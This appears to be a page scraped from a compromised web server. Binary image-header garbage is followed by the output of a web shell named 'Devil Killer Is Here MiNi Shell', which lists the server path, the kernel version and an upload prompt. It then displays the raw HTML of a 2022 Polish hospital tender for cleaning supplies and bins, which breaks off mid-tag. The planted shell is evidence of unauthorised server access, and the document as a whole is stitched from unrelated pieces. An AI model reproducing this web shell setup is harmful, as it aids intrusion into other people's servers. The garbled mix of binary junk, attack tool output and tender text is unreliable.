JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220315/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220315/0008633201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawy środków i sprzętu do utrzymania czystości </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">5 Wojskowy Szpital Kliniczny z POlikliniką SP ZOZ w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351506868</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wrocławska 1-3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-901</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">126308059</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">126308059</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zam@5wszk.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://5wszk.com.pl/zamowienia-publiczne</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawy środków i sprzętu do utrzymania czystości </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5664498f-a44e-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00086332</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00030205/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.28 Dostawa środków i sprzętu do utrzymania czystości, oraz koszy i stelaży na odpady.Dostawa środków i sprzętu do utrzymania czystości, oraz koszy i stelaży na odpady.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://5wszk.com.pl/zamowienia-publiczne <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://5wszk.com.pl/zamowienia-publicznehttps://miniportal.uzp.gov.pl/https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówieniakomunikacjamiędzyZamawiającymaWykonawcamiodbywasięprzyużyciuminiPortaluhttps://miniportal.uzp.gov.pl/,ePUAPuhttps://epuap.gov.pl/wps/portalorazpocztyelektronicznej.postępowaniu<br/>o udzielenie zamówieniapublicznego, musiposiadać konto naePUAP.Wykonawcaposiadający konto naePUAPma dostępdoformularzy:złożenia,zmiany,<br/>wycofania ofertylubwnioskuoraz do formularza dokomunikacji.Wymaganiatechniczne iorganizacyjnewysyłaniaiodbieraniadokumentówelektronicznych,elektronicznych<br/>kopiidokumentów i oświadczeńorazinformacjiprzekazywanych przy ich użyciuopisanezostaływRegulaminiekorzystania z miniPortaluorazRegulaminieePUAP.Maksymalny rozmiarplikówprzesyłanychza pośrednictwemdedykowanychformularzy do:złożenia,zmiany,<br/>wycofaniaofertylubwniosku oraz do komunikacjiwynosi150 MB.Za datę<br/>przekazaniaoferty,wniosków,zawiadomień,dokumentówelektronicznych,oświadczeńlubelektronicznychkopii dokumentów luboświadczeń orazinnych informacji<br/>przyjmuje<br/>siędatęichprzekazania naePUAP. Danepostępowaniapoza SWZ możnawyszukaćrównież na Liściewszystkichpostępowań klikając wcześniejopcję„DlaWykonawców”<br/>lubzestrony głównej z zakładki Postępowania na miniPortalu</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje, że:1.Administratoremdanychosobowychudostępnionych<br/>wramachpostępowaniajestZamawiający.2.Kontakt do inspektoraochrony danych osobowych: adres e-mail<br/>:rodo@5wszk.com.pl,pisemnienaadresZamawiającego:5Wojskowy SzpitalKliniczny z Polikliniką SP ZOZ wKrakowie, ul.Wrocławska 1-3, 30-<br/>901Kraków3.Daneosoboweprzetwarzane będąwzwiązkuzkoniecznościąwypełnieniaobowiązkuprawnego ciążącego na zamawiającym,<br/>wceluzwiązanymzniniejszympostępowaniemoudzieleniezamówieniapublicznego tj. zgodnie z art. 6 ust.1lit.c)rozporządzeniaParlamentuEuropejskiego iRady<br/>(UE)2016/679 z dnia 27 kwietnia 2016 r.wsprawieochronyosóbfizycznychwzwiązkuzprzetwarzaniem danych osobowych i w sprawieswobodnegoprzepływu<br/>takichdanychorazuchyleniadyrektywy95/46/WE(„RODO”) w zw. zustawą zdnia29stycznia 2004r.Prawozamówieńpublicznych(Dz.U.2017.1579 t.j. z dnia 2017.08.24)<br/>(„PZP”);4.Wrazierealizacjizamówieniapublicznegodane osobowe przetwarzanebędą w celu wykonaniaumowytj.zgodnie art. 6ust. 1<br/>litb)RODO.5.odbiorcamidanychosobowych będą osoby<br/>lubpodmioty,którymudostępnionazostaniedokumentacjapostępowania(komisjaprzetargowa)orazodpowiednieorganykontrole wzakresieichkompetencji; 6.Dane<br/>osobowe będą przechowywane,przezokres4latoddniazakończeniapostępowania o udzielenie zamówienia, a jeżeli<br/>czastrwaniaumowyprzekracza4lata,okresprzechowywania obejmujecały czastrwania umowy. Dane temogąbyćprzechowywaneprzezokresdłuższy niż wskazany, o<br/>ilewynika to z ustawy z dnia 14lipca1983r.onarodowymzasobiearchiwalnym iarchiwach (t.j. Dz. U. z 2018 r. poz. 217 z<br/>późn.zm.)iprzepisówwykonawczychdotejustawy.7.obowiązek podania danych osobowychjestwymogiemustawowymokreślonym wprzepisachustawy PZP,związanym<br/>zudziałem wpostępowaniuoudzieleniezamówieniapublicznego;konsekwencje niepodaniaokreślonych danychwynikają zustawyPZP;<br/>8.wodniesieniudodanychosobowych decyzje nie będą podejmowane wsposóbzautomatyzowany.9.Prawa osóbktórychdanesą przetwarzane:•<br/>prawodostępudodanychosobowych;• prawodosprostowaniadanychosobowych(Wyjaśnienie: skorzystanie<br/>zprawadosprostowanianiemożeskutkowaćzmianąwynikupostępowania)• prawo<br/>żądaniaodadministratoraograniczeniaprzetwarzaniadanychosobowych(prawodoograniczenia przetwarzanianiemazastosowania wodniesieniudoprzechowywania, w<br/>celuzapewnienia korzystaniaześrodkówochronyprawnej lub wceluochronypraw innej osoby fizycznej lubprawnej, lub z<br/>uwaginaważnewzględyinteresupublicznegoUniiEuropejskiej lub państwa członkowskiego); 10. prawodowniesieniaskargidoPrezesaUrzęduOchronyDanych<br/>Osobowych,gdyuzna Pani/Pan,żeprzetwarzaniedanychosobowychPani/Panadotyczących naruszaprzepisy;11.nieprzysługujePani/Panu:•prawodousunięcia<br/>danychosobowych;•prawodoprzenoszeniadanychosobowych;prawosprzeciwu,wobecprzetwarzaniadanychosobowych,<br/>gdyżpodstawąprawnąprzetwarzaniadanychosobowychjestkoniecznośćwypełnieniaobowiązku prawnego ciążącego na zamawiającym lubwykonanie umowy</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">obowiązek podaniadanychosobowychjestwymogiemustawowym określonym wprzepisachustawy<br/>PZP,związanymzudziałemwpostępowaniuoudzielenie zamówienia publicznego;konsekwencjeniepodaniaokreślonychdanychwynikają zustawyPZP; 8. w odniesieniu<br/>dodanychosobowychdecyzjeniebędąpodejmowanewsposóbzautomatyzowany. 9. Prawa osób których danesąprzetwarzane:•prawodostępudodanychosobowych;•<br/>prawodosprostowania danychosobowych(Wyjaśnienie:skorzystaniezprawadosprostowania nie<br/>możeskutkowaćzmianąwynikupostępowania)•prawożądaniaodadministratoraograniczenia przetwarzania<br/>danychosobowych(prawodoograniczeniaprzetwarzanianiemazastosowania wodniesieniu do przechowywania,<br/>wceluzapewnieniakorzystaniaześrodkówochronyprawnej lub w celu ochrony praw innej osoby fizycznejlubprawnej, lubzuwagi naważnewzględyinteresu publicznego<br/>UniiEuropejskiej lub państwaczłonkowskiego); 10.prawodowniesieniaskargido Prezesa Urzędu<br/>OchronyDanychOsobowych,gdyuznaPani/Pan,żeprzetwarzaniedanychosobowych Pani/Pana dotyczących<br/>naruszaprzepisy;11.nieprzysługujePani/Panu:•prawodousunięciadanychosobowych;• prawo<br/>doprzenoszeniadanychosobowych;prawosprzeciwu,wobecprzetwarzaniadanych osobowych, gdyż podstawą prawnąprzetwarzania danych osobowych jest konieczność wypełnienia obowiązku prawnego ciążącego na zamawiającym lub wykonanie umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">16/ZP/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp	Szczegółowa nazwa przedmiotu zamówienia	J.m.	Ilość jednostek miary	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. Brutto	Nazwa handlowa, nazwa producenta, nr katalogowy producenta<br/>1.	Kwasowy preparat do codziennego mycia kwasoodpornych powierzchni w toaletach, skoncentrowany, zalecany do stosowania przy twardej wodzie. Produkt skutecznie usuwa zanieczyszczenia, nie pozostawiając zacieków. Świeży, przyjemny zapach. Bezpieczny dla armatury chromowej i ze stali nierdzewnej. Zawiera w składzie kwas cytrynowy. Kolor przejrzysty czerwony. Ciecz o wartości pH 1,6; gęstości (20oC) ok.1,102 g/cm3. Produkt pracuje w minimalnym stężeniu 0,2%. Wymagane opakowanie to saszetka o pojemności 2,5l. Produkt pasuje do automatycznego systemu dozującego Quatro Sellect.	saszetka	90 <br/>2.	Preparat do codziennego mycia wszystkich wodoodpornych podłóg, zabezpieczonych i nie zabezpieczonych, wysoko skoncentrowany. Skutecznie usuwa zanieczyszczenia przy niskich stężeniach użytkowych, niskopieniący. Szybko wysycha nie pozostawiając zacieków. Zawiera technologię ONT, neutralizującą nieprzyjemne zapachy, pozostawia świeży, przyjemny zapach. Przejzysta zielona ciecz o wartości pH koncentratu ok. 8,3; gęstość (20oC) ok. 1g/cm3. Minimalne stężenie produktu: 0,2% - 0,4%. Wymagane opakowanie to saszetka o pojemności 2,5l. Produkt pasuje do automatycznego systemu dozującego Quatro Sellect.	saszetka	60 <br/>3.	Uniwersalny preparat silnie skoncentrowany, silmnie perfumowany. Jest preparatem czyszczącym, odtłuszczającym, nie tworzącym powłok. Preparat posiada zapach zielonego jabłka stworzony w oparciu o technologię neutralizacji zapachów O.N.T. Kolor przejrzysty zielony.Gęstość (20°C): 1.034 g/cm³ (20°C), pH ok 10. Polecany jest do czyszczenia podłóg wodoodpornych, niezabezpieczonych powłokami oraz wszystkich powierzchni wodozmywalnych. Skutecznie i długotrwale, neutralizuje nieprzyjemne zapachy np. nikotyny oraz takie, które można napotkać w toaletach. Minimalne stężenie produktu: 0,4%. Opakowanie saszetka 2,5 l. Produkt pasuje do automatycznego systemu dozującego Quatro Sellect.	saszetka	30 <br/>4.	Skoncentrowany preparat do codziennego mycia wodoodpornych powierzchni, nie pozostawia smug (z przeznaczeniem do mycia szkła, szyb i luster). Produkt neutralny chemicznie. Kolor preparatu - przejrzysta niebieska ciecz, gęstość 20°C: ok 0,99/cm3, pH w 20°C ok: 6,2. Zalecane dozowanie: od 0,2% Opakowanie saszetka 2,5 l. Produkt pasuje do automatycznego systemu dozującego Quatro Sellect.	saszetka	100 <br/>5.	Kwasowy preparat (koncentrat) do codziennego mycia toalet, usuwa zanieczyszczenia z powierzchni emaliowanych, porcelanowych, ceramicznych i szklanych - bezpieczny dla armatury i stali nierdzewnej. Szybko i skutecznie usuwa zabrudzenia. Zapach cytrynowy. Produkt pracuje w stężeniu 0,5 do 1% w systemie dozującym. Wartość PH ok. 2,7.Gęstość w 20°C ok. 1,035 g/cm³ . Posiada atest PZH. Kolor przezroczysty czerwony. Opakowanie kanister 5l.	karnister	5 <br/>6.	Preparat do codziennego mycia podłóg, koncentrat. Preparat skutecznie usuwa zabrudzenia z podłóg, neutralny chemicznie, nie pieni się, nie pozostawia zacieków. Przeznaczony także do maszyn szorujących. Dozowanie: 0,5 % - 5%, pH: ok.8,5, gęstość w 20°C ok 1,0. Kolor zielony. Opakowanie kanister 5 l.	karnister	5 <br/>7.	Preparat do mycia podłóg i wszystkich powierzchni zmywalnych, preparat silnie skoncentrowany, zapachowy. Prudukt czyszczący, odtłuszczający, nie tworzący powłok. Preparat posiada zapach zielonego jabłka stworzony w oparciu o technologię neutralizacji zapachów O.N.T. Stęzenie: 1% do 5%. Wartośc pH roztwór, w 20ºC ok. 5,5. Gęstość w 20°C ok. 1,01g/cm³. Kolor - ciecz zielona. Opakowanie kanister 5l.	karnister	5 <br/>8.	Skoncentrowany preparat do usuwania osadów kamienia wapiennego z kwasoodpornych powierzchni w łazience. Produkt nieagresywny chemicznie w stosunku do powierzchni odpornych na działanie kwasów. Opakowanie: butelka 1 l. Kolor preparatu - czerwona ciecz, gęstość 20°C: ok 1,108/cm3, pH (1% w 20°C) ok: 2,0. Skład: kwas fosforowy, niejonowe powierzchniowo czynnych, kompozycje zapachowe. Dozowanie: 1% - 10%	butelka	400 <br/>9.	Powłoka polimerowa o podwyższonej wytrzymałości do większości typów podłóg wodoodpornych (np. kamień, lastriko, linoleum). Preparat o delikatnym zapachu. Przeznaczony do stosowania w szpitalach. Preparat po nałożeniu wykazuje dużą odporność na zarysowania. Preparat w postaci białej cieczy, gęstość w 20°C ok 1,08 g/cm3, pH koncentratu ok 8,2. Produkt gotowy do uzycia. Opakowanie karnister 5 l.	karnister	90 <br/>10.	Zdzieracz do usuwania powłok polimerowych i woskowych z podłóg wodoodpornych, NIE WYMAGAJACY NEUTRALIZACJI, wysoko alkaliczny. Preparat przeznaczony do usuwania starych warstw powłok polimerowych, przed nałożeniem nowej. Preparat w postaci jasnozółtej cieczy, gęstość w 20°C ok 1,04 g/cm3. pH koncentratu ok 13,2. Dozowanie produktu od 10% (1 l produktu na 10 l wody). Opakowanie karnister 5 l.	kasnister	110 <br/>RAZEM <br/><br/>Zamawiający oświadcza, iż posiada automatyczne systemy dozujące produktów z pozycji 1, 2, 3, 4. Zamawiający wymaga, aby asortyment z tych pozycji był kompatybilny z posiadanymi automatycznymi systemami dozującymi, które wykluczają kontakt użytkowika ze skoncentrowanymi produktami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39830000-9 - Środki czyszczące</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje skorzystanie z prawa opcji zgodnie z postanowieniami projektu umowy w tym zakresie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp	Szczegółowa nazwa przedmiotu zamówienia	J.m.	Ilość jednostek miary	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. Brutto	Nazwa handlowa, nazwa producenta, nr katalogowy producenta<br/>1.	Stelaż podwójny na 2 worki o poj. 100-120 l na wózku jezdnym. Przeznaczony do zbierania oraz transportu bielizny brudnej lub odpadów medycznych. Stelaż metalowy ocynkowany z powłoką chromowaną, lub stal kwasoodporna. Pokrywy koloru niebieskiego i czerwonego, podnoszone przyciskiem pedałowym. Pokrywa ze spowalniaczem cichego opadania. Obręcz posiada zaciski, lub obręcz zabezpieczająca przed zsunięciem sie worka. Wózek posiada podest na worek. Wyposażony w koła o średnicy 7-10 cm, minimum dwa koła z hamulcem. Wymiary - wysokość: 92-94 cm, szerokość: 78-82 cm, głębokość: 46-48 cm. Powierzchnie wózka odporne na działanie środków dezynfekcyjnych i korozję.	sztuka	30 <br/>2.	Stelaż pojedyńczy na worek o poj. 100-120 l na wózku jezdnym. Przeznaczony do zbierania oraz transportu bielizny brudnej lub odpadów medycznych. Stelaż metalowy ocynkowany z powłoką chromowaną, lub stal kwasoodporna. Pokrywa podnoszona przyciskiem pedałowym - kolor czerwony. Pokrywa ze spowalniaczem cichego opadania. Obręcz posiada zaciski, lub obręcz zabezpieczająca przed zsunięciem sie worka. Wózek posiada podest na worek. Wyposażony w koła o średnicy 7-10 cm, minimum dwa koła z hamulcem. Wymiary- wysokość 92-94 cm, szerokość 40-43 cm, głębokość 46-48 cm. Powierzchnie wózka odporne na działanie środków dezynfekcyjnych i korozję.	sztuka	25 <br/>3.	Stelaż pojedyńczy na worek o poj. 100-120 l na wózku jezdnym. Przeznaczony do zbierania oraz transportu bielizny brudnej lub odpadów medycznych. Stelaż metalowy ocynkowany z powłoką chromowaną, lub stal kwasoodporna. Pokrywa podnoszona przyciskiem pedałowym - kolor niebieski. Pokrywa ze spowalniaczem cichego opadania. Obręcz posiada zaciski, lub obręcz zabezpieczająca przed zsunięciem sie worka. Wózek posiada podest na worek. Wyposażony w koła o średnicy 7-10 cm, minimum dwa koła z hamulcem. Wymiary- wysokość 92-94 cm, szerokość 40-43 cm, głębokość 46-48 cm. Powierzchnie wózka odporne na działanie środków dezynfekcyjnych i korozję.	sztuka	25 <br/>4.	Kosz na śmieci, wykonany z wysokiej jakości tworzywa sztucznego z pokrywą, otwierany przyciskiem nożnym. Kolor szary. Pojemność ok. 25 litrów. Wymiary: wysokość 40-41 cm, szerokość 35-36 cm, głębokość 35-36 cm. Powierzchnie kosza odporne na działanie środków dezynfekcyjnych i korozję.	sztuka	150 <br/>5.	Kosz na śmieci, wykonany z wysokiej jakości tworzywa sztucznego z pokrywą, otwierany przyciskiem nożnym. Kolor szary. Pojemnośc ok. 40 litrów. Wymiary- wysokość 54-55 cm, szerokość 32-33 cm, głębokość 37-38 cm. Powierzchnie kosza odporne na działanie środków dezynfekcyjnych i korozję.	sztuka	20 <br/>RAZEM </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39224340-3 - Kosze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje skorzystanie z prawa opcji zgodnie z postanowieniami projektu umowy w tym zakresie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span 